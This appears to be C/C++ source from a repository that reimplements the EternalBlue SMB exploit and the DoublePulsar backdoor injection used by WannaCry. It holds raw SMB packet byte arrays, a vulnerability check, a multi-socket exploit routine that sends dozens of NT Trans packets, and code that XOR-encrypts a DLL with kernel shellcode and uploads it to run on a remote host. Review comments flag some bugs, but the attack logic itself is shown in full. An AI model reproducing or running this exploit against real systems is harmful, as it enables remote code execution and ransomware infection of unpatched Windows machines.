| 140 | int InjectWannaCryDLLViaDoublePulsarBackdoor(SOCKET s, int architectureType, int xkey) 141 | { 142 | /* 143 | DWORD WannacryFileSize = value of -> ReadFile Wannacry EXE into -> EXE_BUFFER_SOMEWHERE 144 | DWORD totalPayloadSize_x86 = 0x4060 + 0x1305 + WannacryFileSize; 145 | DWORD totalPayloadSize_x64 = 0xc8a4 + 0x1800 + WannacryFileSize; 146 | */ 147 | 148 | /* 149 | /* 150 | 32-bit dll start address 0x40B020, size is 0x4060 bytes 151 | 64-bit dll start address 0x40F080, size is 0xc8a4 
bytes 152 | 32-bit shellcode start address 0x42E758, size is 0x1305 bytes 153 | 64-bit shellcode start address 0x42FA60, size 0x1800 bytes 154 | */ 155 | const void *rundll_shellcode; 156 | char *DLLPayload; 157 | int shellcode_payload_size; 158 | int DLLSize; 159 | int total_size; 160 | if(architectureType) 161 | { 162 | //32 bits 163 | Payload = &hDLL_x86; 164 | shellcode_payload_size = 0x1305; //decimal: 4869 165 | PayloadSize = 0x50D800; 166 | } 167 | else 168 | { 169 | //64 bits 170 | Payload = &hDLL_x64; 171 | shellcode_payload_size = 0x1800; //decimal: 6144 172 | PayloadSize = 0x50D800; 173 | } 174 | 175 | HGLOBAL hMem = GlobalAlloc(GMEM_ZEROINIT, shellcode_payload_size + PayloadSize + 12); 176 | 177 | //could be wrong but copied from IDA 178 | //looks like the DLL is added to the hMem location right after the runDLL shellcode 179 | memcpy(hMem + shellcode_payload_size, Payload, PayloadSize); 180 | 181 | //not sure what is going on here, but looks like the total_size is getting populated here 182 | /* Kept for historical purposes but most likely WRONG 183 | if (&DLLPayload[shellcode_payload_size] % 4) 184 | { 185 | total_size = 4 * ((signed int)DLLPayload[shellcode_payload_size] / 4) + 4; 186 | } 187 | else 188 | { 189 | total_size = DLLPayload[shellcode_payload_size]; 190 | }*/ 191 | if ( PayloadSize + shellcode_payload_size % 4) { 192 | total_size = 4 * ((5298176 + 6144) / 4) + 4; 193 | } 194 | else { 195 | total_size = 0x50D800 + 0x1800; 196 | } 197 | 198 | if(architectureType) 199 | { 200 | /* source: https://cloud.tencent.com/developer/article/1910271 */ 201 | 202 | //32 bits 203 | rundll_shellcode = &x86_kernel_shellcode; 204 | 205 | /* 0x42ECE9 - 0x42E758 = 0x591 */ 206 | //update payload + shellcode size in the x86 kernel shellcode 207 | *(DWORD*)&x86_kernel_shellcode[1425] = 0x50D800+3440; 208 | 209 | //update DLL size 210 | *(DWORD*)&x86_kernel_shellcode[0x12FD] = 0x50D800; 211 | 212 | //update ordinal 213 | *(DWORD*)&x86_kernel_shellcode[0x1301] = 
1; 214 | } 215 | else 216 | { 217 | /* source: https://cloud.tencent.com/developer/article/1910271 */ 218 | 219 | //64 bits 220 | rundll_shellcode = &x64_kernel_shellcode; 221 | 222 | //shellcode must be patched in 3 areas 223 | /* 1.) Kernel shellcode must be updated to include the DLL size + Userland shellcode size 224 | for proper allocation in memory 225 | */ 226 | DWORD DLL_and_UserlandShellcodeSize = 0x50D800 + 3978; 227 | *(DWORD*)&x64_kernel_shellcode[0x86E] = DLL_and_UserlandShellcodeSize; 228 | //0x4302CE - 0x42FA60 = 0x86E 229 | //x64_kernel_shellcode[2158] = 6144+3978; 230 | 231 | /* Userland shellcode DLL size len */ 232 | /* this value was obtained from subtracting the Userland shellcode size from the Total size of the entire shellcode 233 | so...if entire shellcode size is 6144 or 0x1800 234 | and if userland shellcode is 3978, then kernel shellcode size is 2166 235 | */ 236 | *(DWORD*)&x64_kernel_shellcode[2166+0xf82] = 0x50D800; 237 | //6136 238 | 239 | /* Userland shellcode DLL ordinal to call */ 240 | *(DWORD*)&x64_kernel_shellcode[2166+0xf86] = 1; //default already set to 1 241 | //6140 242 | } 243 | memcpy(hMem, rundll_shellcode, shellcode_payload_size); 244 | xor_payload(xkey, hMem, total_size); 245 | memcpy(send_buffer, wannacry_trans2_exec_packet, 70); 246 | 247 | v9 = total_size / 4096; 248 | v10 = total_size % 4096; 249 | 250 | /* may be needed for signature 251 | #define __PAIR__(high, low) (((unsigned long)(high)< 0) 275 | { 276 | for(i=0; ; ctx=i) 277 | { 278 | o_offset = ctx ^ xkey; 279 | memcpy(Parametersbuffer, (char*)&xor_payload_size, 4); 280 | memcpy(Parametersbuffer + 4, (char*)&chunk_size, 4); 281 | memcpy(Parametersbuffer + 8, (char*)&o_offset, 4); 282 | 283 | //size 70 284 | memcpy(send_buffer, wannacry_Trans2_Request, sizeof(wannacry_Trans2_Request)); 285 | //copy parameters 286 | memcpy(send_buffer + 70 , Parametersbuffer, 12); 287 | //copy 4096 bytes of payload 288 | memcpy(send_buffer + 82, (char *)hMem + ctx, 4096); 289 | 
/* Tail of InjectWannaCryDLLViaDoublePulsarBackdoor(); the function begins above this block.
   NOTE(review): each response is judged by a single byte (index 34 == 82) and the recv()
   return values are never examined, so that byte may be uninitialised or left over from an
   earlier packet. */
send(socket, (char*)send_buffer, 4178, 0);
            recv(socket, (char*)recv_buffer, 4096, 0);
            if(recvbuff[34] != 82)
            {
                //error, doublePulsar should return 82
                break;
            }
            ctx += 4096; //increment counter
            bytesleft -= 4096; //tracker to see how many bytes we have left
        }
    }

    if ( v10 > 0 )
    {
        //update chunk size to what's left in the encrypted payload buffer
        chunk_size = bytesLeft ^ xkey;
        //update offset by XORing the latest value
        o_offset = ctx ^ xkey;
        memcpy(Parametersbuffer, (char*)&xor_payload_size, 4);
        memcpy(Parametersbuffer + 4, (char*)&chunk_size, 4);
        memcpy(Parametersbuffer + 8, (char*)&o_offset, 4);
        //parameters are copied accurately to the buffer

        //size 70
        memcpy(send_buffer, wannacry_Trans2_Request, sizeof(wannacry_Trans2_Request));
        //update last packet SMB Length
        unsigned short smblen;
        smblen = bytesLeft+70+12; //BytesLeft + DoublePulsar Exec Packet Length + Trans2 SESSION_SETUP parameters - 4 since netBIOS isn't counted
        unsigned short smb_length_value = htons(smblen);
        //memcpy(buffer+2, &smblen, 2);
        memcpy(buffer+2, &smb_length_value, 2);

        //copy parameters
        memcpy(send_buffer + 70 , Parametersbuffer, 12);
        //copy last payload size = bytesLeft
        memcpy(send_buffer + 82, (char *)hMem + ctx, bytesLeft);
        send(socket, (char*)send_buffer, bytesLeft+82, 0);
        recv(socket, (char*)recv_buffer, 4096, 0);
    }
    //This part of the code is for debug purposes
    if(recvbuff[34] == 82)
    {
        //DEBUG PURPOSE ONLY
        printf("Doublepulsar ran successfully!\n");
    }
    /////////////////////////////////////////////
    GlobalFree(hMem);
}

/*
 * runPayloadOnTarget: opens one TCP connection to host:hostshort, walks the SMB
 * negotiate / Session Setup AndX / tree connect exchange (patching the user id and
 * tree id it reads back into the shared global request buffers), then sends the
 * trans2_session_setup probe. Only when byte 34 of that reply is 0x51 (presumably the
 * SMB MultiplexID field -- confirm against the packet layout) does it read the
 * architecture byte (22) and the 4-byte signature (18..21), derive the XOR key and
 * hand the socket to InjectWannaCryDLLViaDoublePulsarBackdoor().
 *
 * Returns 0 unconditionally, so a caller cannot tell whether the probe matched.
 *
 * NOTE(review): defects left as-is in this block:
 *  - socket()/connect()/send()/recv() results are never checked; after a failed or
 *    short recv() the bytes read from recvbuff are uninitialised stack memory.
 *  - `name` is declared `struct sockaddr`, which has no sin_* members.
 *  - `signature` has four elements, so `signature[4] = '\0'` writes past its end.
 *  - `trans2_session_setup[29] = treeid[1]` is missing its semicolon.
 *  - ArchitectureType, LE2INT() and ComputeDOUBLEPULSARXorKey() are defined outside
 *    this block; the function also mutates global packet buffers that other
 *    functions in this listing write as well, so it is not reentrant.
 */
int runPayloadOnTarget(char *host, u_short hostshort)
{
    unsigned int sig;
    unsigned int XorKey;
    SOCKET dsock;
    struct sockaddr name; //NOTE(review): accessed below as if it were struct sockaddr_in
    char userid[2];
    char treeid[2];
    char recvbuff[1024]; //never zeroed; only meaningful after a successful recv()

    name.sin_family = AF_INET;
    name.sin_addr.s_addr = inet_addr(host);
    name.sin_port = htons(hostshort);
    dsock = socket(AF_INET, SOCK_STREAM, 0);
    connect(dsock, (struct sockaddr*) &name, sizeof(name)); //return value ignored

    //send SMB negociate packet
    send(dsock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0);
    recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0);

    //send Session Setup AndX request
    send(dsock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0);
    recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0);

    //copy userID from recvbuff @ 32,33
    userid[0] = recvbuff[32];
    userid[1] = recvbuff[33];

    //update userID in the tree connect request
    treeConnectRequest[32] = userid[0];
    treeConnectRequest[33] = userid[1];
    send(dsock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0);
    recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0);

    //copy treeID from recvbuff @ 28, 29
    treeid[0] = recvbuff[28];
    treeid[1] = recvbuff[29];

    trans2_session_setup[28] = treeid[0];
    trans2_session_setup[29] = treeid[1]
    trans2_session_setup[32] = userid[0];
    trans2_session_setup[33] = userid[1];

    send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0);
    recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0);

    unsigned char signature[4];
    if (recvbuff[34] == 0x51)
    {
        ArchitectureType = int(recvbuff[22]); //C++ functional cast; not valid C

        signature[0] = recvbuff[18];
        signature[1] = recvbuff[19];
        signature[2] = recvbuff[20];
        signature[3] = recvbuff[21];
        signature[4] = '\0'; //NOTE(review): out-of-bounds write, array has 4 elements
        sig = LE2INT(signature);
        XorKey = ComputeDOUBLEPULSARXorKey(sig);
        InjectWannaCryDLLViaDoublePulsarBackdoor(dsock, ArchitectureType, XorKey);
    }
    closesocket(dsock);
    return 0;
}

-------------------------------------------------------------------------------- /Eternalblue.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #pragma comment(lib, "wsock32.lib") 6 | #include "Eternalblue.h" 7 | 8 | unsigned char SmbNegociate[] = 9 | "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x00" 10 | "\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 11 | "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30" 12 | "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; 13 | 14 | unsigned char Session_Setup_AndX_Request[] = 15 | "\x00\x00\x00\x88\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc0\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00" 17 | "\x0d\xff\x00\x88\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" 18 | "\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x4b\x00\x00\x00\x00\x00\x00\x57\x00" 19 | "\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00" 20 | "\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00" 21 | "\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00" 22 | "\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"; 23 | 24 | unsigned char treeConnectRequest[] = 25 | "\x00\x00\x00\x60\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc0" 26 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" 27 | "\x00\x08\x40\x00\x04\xff\x00\x60\x00\x08\x00\x01\x00\x35\x00\x00" 28 | "\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00" 29 | 
"\x38\x00\x2e\x00\x31\x00\x37\x00\x35\x00\x2e\x00\x31\x00\x32\x00"
"\x38\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f\x3f\x00";

/* Static request bytes; CheckForEternalBlue() below patches the tree id and user id
   into offsets 28/29 and 32/33 in place, so this global is mutated at runtime. */
unsigned char transNamedPipeRequest[] =
"\x00\x00\x00\x4a\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x01\x28\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x8e\xa3\x01\x08"
"\x52\x98\x10\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x4a\x00\x02\x00\x23\x00\x00"
"\x00\x07\x00\x5c\x50\x49\x50\x45\x5c\x00";

/*
 * replacePlaceholderWithBytes: in-place substitution inside `buffer` (bufferSize bytes):
 * each match is replaced by the first two bytes of `newValue`, and the remainder of the
 * buffer is shifted down so the logical content becomes
 * bufferSize - placeholderLength + 2 bytes long. `buffer` is modified; nothing is
 * returned and the caller's size is not updated.
 *
 * NOTE(review), behaviour left unchanged:
 *  - memchr() searches for placeholder[0] only; the rest of `placeholder` is never
 *    compared, so any single byte equal to its first character counts as a match.
 *  - malloc() is not checked; the memcpy() calls below dereference NULL on failure.
 *  - the final memcpy() writes bufferSize - placeholderLength + sizeof(WORD) bytes back
 *    into `buffer`, which only stays inside the buffer when placeholderLength >= 2.
 *  - the shifted-down tail leaves the last placeholderLength - 2 bytes of `buffer`
 *    untouched (stale), and the loop keeps scanning with the original bufferSize.
 */
void replacePlaceholderWithBytes(unsigned char* buffer, size_t bufferSize, const char* placeholder, unsigned char *newValue) {
    size_t placeholderLength = strlen(placeholder);
    size_t offset = 0;

    // Iterate through the buffer to find and replace the placeholder
    while (offset < bufferSize) {
        // Find the position of the placeholder in the remaining buffer
        // (only the first byte of the placeholder is actually matched here)
        void* position = memchr(buffer + offset, placeholder[0], bufferSize - offset);

        // If the placeholder is found, replace it with the new value
        if (position != NULL) {
            // Calculate the position relative to the entire buffer
            size_t absolutePosition = (unsigned char*)position - buffer;

            // Check if the remaining buffer is long enough to contain the placeholder
            if (absolutePosition + placeholderLength <= bufferSize) {
                // Allocate memory for the new string (unchecked allocation)
                char* newString = (char*)malloc(bufferSize - placeholderLength + sizeof(unsigned char)*2 );

                // Copy the content before the placeholder
                memcpy(newString, buffer, absolutePosition);

                // Copy the two bytes of the new value as characters
                memcpy(newString + absolutePosition, (unsigned char*)newValue, sizeof(unsigned char)*2);

                // Copy the content after the placeholder
                memcpy(newString + absolutePosition + sizeof(unsigned char)*2, buffer + absolutePosition + placeholderLength,
                       bufferSize - absolutePosition - placeholderLength);

                // Update the original buffer with the new string
                // (sizeof(WORD) == 2 is assumed to equal the two-byte replacement width above)
                memcpy(buffer, newString, bufferSize - placeholderLength + sizeof(WORD));

                // Free the allocated memory
                free(newString);

                // Move the offset to the end of the replaced portion
                offset = absolutePosition + sizeof(unsigned char)*2;
            }
            else {
                // If the remaining buffer is not long enough, exit the loop
                break;
            }
        }
        else {
            // If the placeholder is not found, exit the loop
            break;
        }
    }
}

//Usage: replace_SMB_values(SMB_Trans2_Packet, "__TREEID__PLACEHOLDER__", treeid);
//replace_SMB_values(SMB_Trans2_Packet, "__USERID__PLACEHOLDER__", userid);
/*
 * replace_SMB_values: thin wrapper around replacePlaceholderWithBytes(). Always returns 0.
 *
 * NOTE(review), left as-is:
 *  - `sizeof(smb_packet)` is applied to a pointer parameter, so bufferSize is the size
 *    of a pointer minus one, not the packet length.
 *  - `placeholder` is a single `const char`, but the callee (and the usage comment
 *    above) expects a `const char *` string.
 *  - not called anywhere in this listing; the other functions patch offsets directly.
 */
int replace_SMB_values(unsigned char *smb_packet, const char placeholder, unsigned char *replacevalue)
{
    // Example SMB string to replace
    /*
    unsigned char smb_packet[] = "\x00\x00\x10\x4e\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x18\x07\xc0"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x5F\x54\x52\x45\x45\x49\x44\x5F\x50\x4C\x41\x43\x45\x48\x4F\x4C\x44\x45\x52\x5F\x5F\xff\xfe"
    "\x00\x08\x42\x00\x0f\x0c\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00"
    "\x00\x25\x89\x1a\x00\x00\x00\x0c\x00\x42\x00\x00\x10\x4e\x00\x01"
    "\x00\x0e\x00\x0d\x10\x00"; */
    size_t bufferSize = sizeof(smb_packet) - 1; // Exclude the null terminator (sizeof a pointer here, see note above)

    /*
    __USERID__PLACEHOLDER__
    __TREEID__PLACEHOLDER__
    __TREEPATH_REPLACE__
    */
    //const char placeholder[] = "__TREEID_PLACEHOLDER__";
    //unsigned char treeid[] = "\xA6\xFF";

    //unsigned char treeid[2];
    //treeid[0] = 0xA6;
    //treeid[1] = 0xF8;

    // Call the function to replace the placeholder with the new value
    replacePlaceholderWithBytes(smb_packet, bufferSize, placeholder, replacevalue);
    return 0;
}

/*
 * CheckForEternalBlue: connects to host:port and performs the SMB negotiate /
 * Session Setup AndX / tree connect / trans named-pipe exchange, copying the user id
 * and tree id from the replies into the shared global request buffers. The NT_STATUS
 * comparison and both return paths are in the continuation past this block.
 *
 * NOTE(review), left as-is:
 *  - `ret` is a DWORD (unsigned), so `ret <= 0` never catches a negative
 *    SOCKET_ERROR result; likewise `sock <= 0` is not the INVALID_SOCKET test.
 *  - every early `return 1` leaks `sock`.
 *  - recv() lengths are never checked, so recvbuff[28..33] may be uninitialised.
 *  - treeConnectRequest/transNamedPipeRequest are globals patched in place; the
 *    function is therefore not reentrant.
 */
int CheckForEternalBlue(char *host, int port)
{
    struct sockaddr_in server;
    SOCKET sock;
    DWORD ret; //unsigned: the `ret <= 0` checks below cannot see a negative error
    unsigned char recvbuff[2048];
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock <= 0)
    {
        return 1;
    }
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(host);
    server.sin_port = htons(port);
    ret = connect(sock, (struct sockaddr*)&server, sizeof(server)); //result assigned but never tested

    //send SMB negociate packet
    send(sock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0);
    recv(sock, (char*)recvbuff, sizeof(recvbuff), 0);

    //send Session Setup AndX request
    ret = send(sock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0);
    if (ret <= 0)
    {
        return 1; //socket leaked
    }
    recv(sock, (char*)recvbuff, sizeof(recvbuff), 0);

    char userid[2];
    char treeid[2];
    //copy userID from recvbuff @ 32,33
    userid[0] = recvbuff[32];
    userid[1] = recvbuff[33];

    //update userID in the tree connect request
    treeConnectRequest[32] = userid[0];
    treeConnectRequest[33] = userid[1];

    //send TreeConnect request
    ret = send(sock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0);
    if (ret <= 0)
    {
        return 1; //socket leaked
    }
    recv(sock, (char*)recvbuff, sizeof(recvbuff), 0);

    //copy treeID from recvbuff @ 28, 29
    treeid[0] = recvbuff[28];
    treeid[1] = recvbuff[29];
    //update treeid & userid in the transNamedPipe Request
    transNamedPipeRequest[28] = treeid[0];
    transNamedPipeRequest[29] = treeid[1];
    transNamedPipeRequest[32] = userid[0];
    transNamedPipeRequest[33] = userid[1];

    //send transNamedPipe request
    ret = send(sock, (char*)transNamedPipeRequest, sizeof(transNamedPipeRequest) - 1, 0);
    if (ret <= 0)
    {
        return 1; //socket leaked
    }
    recv(sock, (char*)recvbuff, sizeof(recvbuff), 0);

    //compare the NT_STATUS response to 0xC0000205 (
STATUS_INSUFF_SERVER_RESOURCES) 183 | if (recvbuff[9] == 0x05 && recvbuff[10] == 0x02 && recvbuff[11] == 0x00 && recvbuff[12] == 0xc0) 184 | { 185 | closesocket(sock); 186 | return 1; 187 | } 188 | else 189 | { 190 | closesocket(sock); 191 | //not vulnerable 192 | return 1; 193 | } 194 | } 195 | 196 | int EternalBluePwn(char *host, int port) 197 | { 198 | struct sockaddr_in server; 199 | SOCKET s1, s2, s3, s4, s5, s6, s7, s8, s9, s10, s11, s12, s13, s14, s15, s16, s17, s18, s19, s20, s21; 200 | 201 | char userid[2]; 202 | char treeid[2]; 203 | 204 | s1 = socket(AF_INET, SOCK_STREAM, 0); 205 | s2 = socket(AF_INET, SOCK_STREAM, 0); 206 | s3 = socket(AF_INET, SOCK_STREAM, 0); 207 | s4 = socket(AF_INET, SOCK_STREAM, 0); 208 | 209 | s5 = socket(AF_INET, SOCK_STREAM, 0); 210 | s6 = socket(AF_INET, SOCK_STREAM, 0); 211 | s7 = socket(AF_INET, SOCK_STREAM, 0); 212 | s8 = socket(AF_INET, SOCK_STREAM, 0); 213 | s9 = socket(AF_INET, SOCK_STREAM, 0); 214 | s10 = socket(AF_INET, SOCK_STREAM, 0); 215 | s11 = socket(AF_INET, SOCK_STREAM, 0); 216 | s12 = socket(AF_INET, SOCK_STREAM, 0); 217 | 218 | s13 = socket(AF_INET, SOCK_STREAM, 0); 219 | s14 = socket(AF_INET, SOCK_STREAM, 0); 220 | s15 = socket(AF_INET, SOCK_STREAM, 0); 221 | s16 = socket(AF_INET, SOCK_STREAM, 0); 222 | 223 | s17 = socket(AF_INET, SOCK_STREAM, 0); 224 | s18 = socket(AF_INET, SOCK_STREAM, 0); 225 | s19 = socket(AF_INET, SOCK_STREAM, 0); 226 | s20 = socket(AF_INET, SOCK_STREAM, 0); 227 | s21 = socket(AF_INET, SOCK_STREAM, 0); 228 | 229 | server.sin_family = AF_INET; 230 | server.sin_addr.s_addr = inet_addr(host); 231 | server.sin_port = htons(port); 232 | 233 | connect(s1, (struct sockaddr*) & server, sizeof(server)); 234 | 235 | //send negociation 236 | send(s1, (char*)smbnegociate, sizeof(smbnegociate) - 1, 0); 237 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 238 | 239 | send(s1, (char*)session_setup, sizeof(session_setup) - 1, 0); 240 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 241 | userid[0] = 
recvbuff[32]; 242 | userid[1] = recvbuff[33]; 243 | 244 | //update userID in the tree connect request 245 | treeconnect[32] = userid[0]; 246 | treeconnect[33] = userid[1]; 247 | 248 | send(s1, (char*)treeconnect, sizeof(treeconnect) - 1, 0); 249 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 250 | //copy treeID from recvbuff @ 28, 29 251 | treeid[0] = recvbuff[28]; 252 | treeid[1] = recvbuff[29]; 253 | 254 | send(s1, (char*)NTTrans, sizeof(NTTrans) - 1, 0); 255 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 256 | 257 | send(s1, (char*)NTTrans2, sizeof(NTTrans2) - 1, 0); 258 | 259 | send(s1, (char*)NTTrans3, sizeof(NTTrans3) - 1, 0); 260 | 261 | send(s1, (char*)NTTrans4, sizeof(NTTrans4) - 1, 0); 262 | 263 | send(s1, (char*)NTTrans5, sizeof(NTTrans5) - 1, 0); 264 | 265 | send(s1, (char*)NTTrans6, sizeof(NTTrans6) - 1, 0); 266 | 267 | send(s1, (char*)NTTrans7, sizeof(NTTrans7) - 1, 0); 268 | 269 | send(s1, (char*)NTTrans8, sizeof(NTTrans8) - 1, 0); 270 | 271 | send(s1, (char*)NTTrans9, sizeof(NTTrans9) - 1, 0); 272 | 273 | send(s1, (char*)NTTrans10, sizeof(NTTrans10) - 1, 0); 274 | 275 | send(s1, (char*)NTTrans11, sizeof(NTTrans11) - 1, 0); 276 | 277 | send(s1, (char*)NTTrans12, sizeof(NTTrans12) - 1, 0); 278 | 279 | send(s1, (char*)NTTrans13, sizeof(NTTrans13) - 1, 0); 280 | 281 | send(s1, (char*)NTTrans14, sizeof(NTTrans14) - 1, 0); 282 | 283 | send(s1, (char*)NTTrans15, sizeof(NTTrans15) - 1, 0); 284 | 285 | send(s1, (char*)NTTrans16, sizeof(NTTrans16) - 1, 0); 286 | 287 | send(s1, (char*)NTTrans17, sizeof(NTTrans17) - 1, 0); 288 | 289 | send(s1, (char*)NTTrans18, sizeof(NTTrans18) - 1, 0); 290 | 291 | send(s1, (char*)NTTrans19, sizeof(NTTrans19) - 1, 0); 292 | 293 | send(s1, (char*)NTTrans20, sizeof(NTTrans20) - 1, 0); 294 | 295 | send(s1, (char*)NTTrans21, sizeof(NTTrans21) - 1, 0); 296 | 297 | send(s1, (char*)NTTrans22, sizeof(NTTrans22) - 1, 0); 298 | 299 | send(s1, (char*)NTTrans23, sizeof(NTTrans23) - 1, 0); 300 | 301 | send(s1, (char*)NTTrans24, 
sizeof(NTTrans24) - 1, 0); 302 | 303 | send(s1, (char*)NTTrans25, sizeof(NTTrans25) - 1, 0); 304 | 305 | send(s1, (char*)NTTrans26, sizeof(NTTrans26) - 1, 0); 306 | 307 | send(s1, (char*)NTTrans27, sizeof(NTTrans27) - 1, 0); 308 | send(s1, (char*)NTTrans28, sizeof(NTTrans28) - 1, 0); 309 | 310 | send(s1, (char*)NTTrans29, sizeof(NTTrans29) - 1, 0); 311 | 312 | send(s1, (char*)NTTrans30, sizeof(NTTrans30) - 1, 0); 313 | 314 | send(s1, (char*)NTTrans31, sizeof(NTTrans31) - 1, 0); 315 | 316 | send(s1, (char*)NTTrans32, sizeof(NTTrans32) - 1, 0); 317 | 318 | send(s1, (char*)NTTrans33, sizeof(NTTrans33) - 1, 0); 319 | 320 | send(s1, (char*)NTTrans34, sizeof(NTTrans34) - 1, 0); 321 | 322 | send(s1, (char*)NTTrans35, sizeof(NTTrans35) - 1, 0); 323 | 324 | send(s1, (char*)NTTrans36, sizeof(NTTrans36) - 1, 0); 325 | 326 | send(s1, (char*)NTTrans37, sizeof(NTTrans37) - 1, 0); 327 | 328 | send(s1, (char*)NTTrans38, sizeof(NTTrans38) - 1, 0); 329 | send(s1, (char*)NTTrans39, sizeof(NTTrans39) - 1, 0); 330 | 331 | send(s1, (char*)NTTrans40, sizeof(NTTrans40) - 1, 0); 332 | 333 | send(s1, (char*)NTTrans41, sizeof(NTTrans41) - 1, 0); 334 | 335 | send(s1, (char*)NTTrans42, sizeof(NTTrans42) - 1, 0); 336 | 337 | send(s1, (char*)NTTrans43, sizeof(NTTrans43) - 1, 0); 338 | 339 | send(s1, (char*)NTTrans44, sizeof(NTTrans44) - 1, 0); 340 | 341 | send(s1, (char*)NTTrans45, sizeof(NTTrans45) - 1, 0); 342 | 343 | send(s1, (char*)NTTrans46, sizeof(NTTrans46) - 1, 0); 344 | 345 | send(s1, (char*)SmbEcho, sizeof(SmbEcho) - 1, 0); 346 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 347 | 348 | //connect to second socket 349 | connect(s2, (struct sockaddr*) & server, sizeof(server)); 350 | send(s2, (char*)negociate2, sizeof(negociate2) - 1, 0); 351 | recv(s2, (char*)recvbuff, sizeof(recvbuff), 0); 352 | 353 | send(s2, (char*)unknown_packet_socket2, sizeof(unknown_packet_socket2) - 1, 0); 354 | recv(s2, (char*)recvbuff, sizeof(recvbuff), 0); 355 | 356 | connect(s3, (struct sockaddr*) & 
server, sizeof(server)); 357 | connect(s4, (struct sockaddr*) & server, sizeof(server)); 358 | 359 | send(s3, (char*)unknown_packet_socket3, sizeof(unknown_packet_socket3) - 1, 0); 360 | 361 | connect(s5, (struct sockaddr*) & server, sizeof(server)); 362 | 363 | send(s4, (char*)unknown_packet_socket4, sizeof(unknown_packet_socket4) - 1, 0); 364 | 365 | send(s5, (char*)unknown_packet_socket5, sizeof(unknown_packet_socket5) - 1, 0); 366 | 367 | connect(s6, (struct sockaddr*) & server, sizeof(server)); 368 | send(s6, (char*)unknown_packet_socket5, sizeof(unknown_packet_socket5) - 1, 0); 369 | 370 | connect(s7, (struct sockaddr*) & server, sizeof(server)); 371 | connect(s8, (struct sockaddr*) & server, sizeof(server)); 372 | send(s7, (char*)unknown_packet_socket7, sizeof(unknown_packet_socket7) - 1, 0); 373 | 374 | send(s8, (char*)unknown_packet_socket8, sizeof(unknown_packet_socket8) - 1, 0); 375 | 376 | connect(s9, (struct sockaddr*) & server, sizeof(server)); 377 | connect(s10, (struct sockaddr*) & server, sizeof(server)); 378 | 379 | send(s9, (char*)unknown_packet_socket9, sizeof(unknown_packet_socket9) - 1, 0); 380 | send(s10, (char*)unknown_packet_socket10, sizeof(unknown_packet_socket10) - 1, 0); 381 | 382 | connect(s11, (struct sockaddr*) & server, sizeof(server)); 383 | connect(s12, (struct sockaddr*) & server, sizeof(server)); 384 | send(s11, (char*)unknown_packet_socket11, sizeof(unknown_packet_socket11) - 1, 0); 385 | 386 | connect(s13, (struct sockaddr*) & server, sizeof(server)); 387 | 388 | send(s12, (char*)unknown_packet_socket12, sizeof(unknown_packet_socket12) - 1, 0); 389 | 390 | connect(s14, (struct sockaddr*) & server, sizeof(server)); 391 | 392 | send(s13, (char*)unknown_packet_socket13, sizeof(unknown_packet_socket13) - 1, 0); 393 | 394 | connect(s15, (struct sockaddr*) & server, sizeof(server)); 395 | 396 | send(s14, (char*)unknown_packet_socket14, sizeof(unknown_packet_socket14) - 1, 0); 397 | 398 | connect(s16, (struct sockaddr*) & server, 
